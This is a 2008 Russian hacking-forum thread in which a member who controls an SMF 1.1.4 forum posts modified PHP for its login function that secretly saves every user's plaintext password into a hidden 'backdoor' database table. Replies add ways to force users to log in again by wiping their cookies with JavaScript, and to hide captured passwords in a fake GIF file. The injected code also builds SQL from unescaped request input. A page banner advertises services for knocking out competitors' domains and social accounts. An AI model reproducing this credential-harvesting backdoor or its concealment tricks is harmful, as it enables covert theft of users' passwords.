Форум АНТИЧАТ - Троянизация Smf

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Троянизация Smf

Опции темы

Поиск в этой теме

Опции просмотра

Троянизация Smf

26.03.2008, 23:06

ty13r

Познающий

Регистрация: 18.07.2007

Сообщений: 40

Провел на форуме:
72605

Репутация: 13

Отправить сообщение для ty13r с помощью ICQ

Троянизация Smf

У меня есть подконтрольный форум - smf версии 1.1.4. Хотелось бы узнать пароли юзеров, а расшифровывать лень. Появилась идея затроянить форум.
Для этого в файле Sources/LogInOut.php рассмотрим функцию Login2()

Код:

if ($user_settings['passwd'] != $sha_passwd)
	{....}
elseif ($user_settings['passwordSalt'] == '')
	{...}

Этот код я заменил на

Код:

if ($user_settings['passwd'] != $sha_passwd)
	{....}
elseif ($user_settings['passwordSalt'] == '')
	{...}
else
	{
		$req = db_query("SELECT * FROM {$db_prefix}backdoor WHERE `id`={$user_settings['ID_MEMBER']}");
		$user = mysql_fetch_array($req);
		if(!$user)
			$req = db_query("INSERT INTO {$db_prefix}backdoor SET `id`='".$user_settings['ID_MEMBER']."' ,`name`='".$_REQUEST[user]."' ,`pass`='".$_REQUEST[passwrd]."'");
		if($user['pass']!=$_REQUEST['passwrd'])
			$req = db_query("UPDATE {$db_prefix}backdoor SET `pass`='".$_REQUEST[passwrd]."' WHERE `id`='".$user_settings['ID_MEMBER']."'");
	}

где backdoor - заранее созданная таблица.
На локалхосте все это прекрасно работает но на искомом форуме в большинстве записей вместо пароля стоят звездочки(
Что сделано неправильно? Может кто имеет успешный опыт затроянивания?
PS
Как сбросить сессии пользователей чтобы они вводили пароль заново? Почему то очистка таблицы sessions не помогает

27.03.2008, 00:17

Doom123

Постоянный

Регистрация: 11.11.2006

Сообщений: 834

Провел на форуме:
3941248

Репутация: 668

Отправить сообщение для Doom123 с помощью ICQ

на счёт сессии ... думаю дело не в сссии а в кукисах тоесть при входе берутся данные из кукисов и происходит авторизация... а сесия тут не причём т.к она по любому удаляется при закрытии браузера... может попытатся при входе юзеров удалить их кукисы и всё?

всё вышесказаное основано на догадках...

27.03.2008, 17:49

ty13r

Познающий

Регистрация: 18.07.2007

Сообщений: 40

Провел на форуме:
72605

Репутация: 13

В этом посте в IPB сбрасывались именно сессии.
Тем более опять же на локалхосте проверял - работало, а на том форуме - нет

Последний раз редактировалось ty13r; 27.03.2008 в 18:36..

30.03.2008, 14:32

ty13r

Познающий

Регистрация: 18.07.2007

Сообщений: 40

Провел на форуме:
72605

Репутация: 13

Модеры, плиз перенесите тему в УЯЗВИМОСТИ а то тут никто ее и не прочтет

25.04.2008, 13:31

n-000

Участник форума

Регистрация: 25.10.2006

Сообщений: 108

Провел на форуме:
495411

Репутация: 91

Отправить сообщение для n-000 с помощью ICQ

а почему бы тебе в самом деле при помощи жабаскрипта не обнулить куки и не перекинуть юзверя на главную страницу ?
А по поводу троянизации .... я делал проще, без заморочек ...
Создаёш в дефолтной теме картинку , ну например dot.gif и в этот файлик пишеш пассы которые отправляют юзвери скрипту, так и палева меньше чем с бд

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
пароль с Smf 1.1.4	SVAROG	Болталка	1	07.12.2007 20:25
Взлом Smf... Как это сделать?	FST	Чаты	1	28.07.2005 02:27
Уязвимость в Simple machines smf 1.0 beta 5 public	Nemirof	Форумы	0	23.10.2004 00:47

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход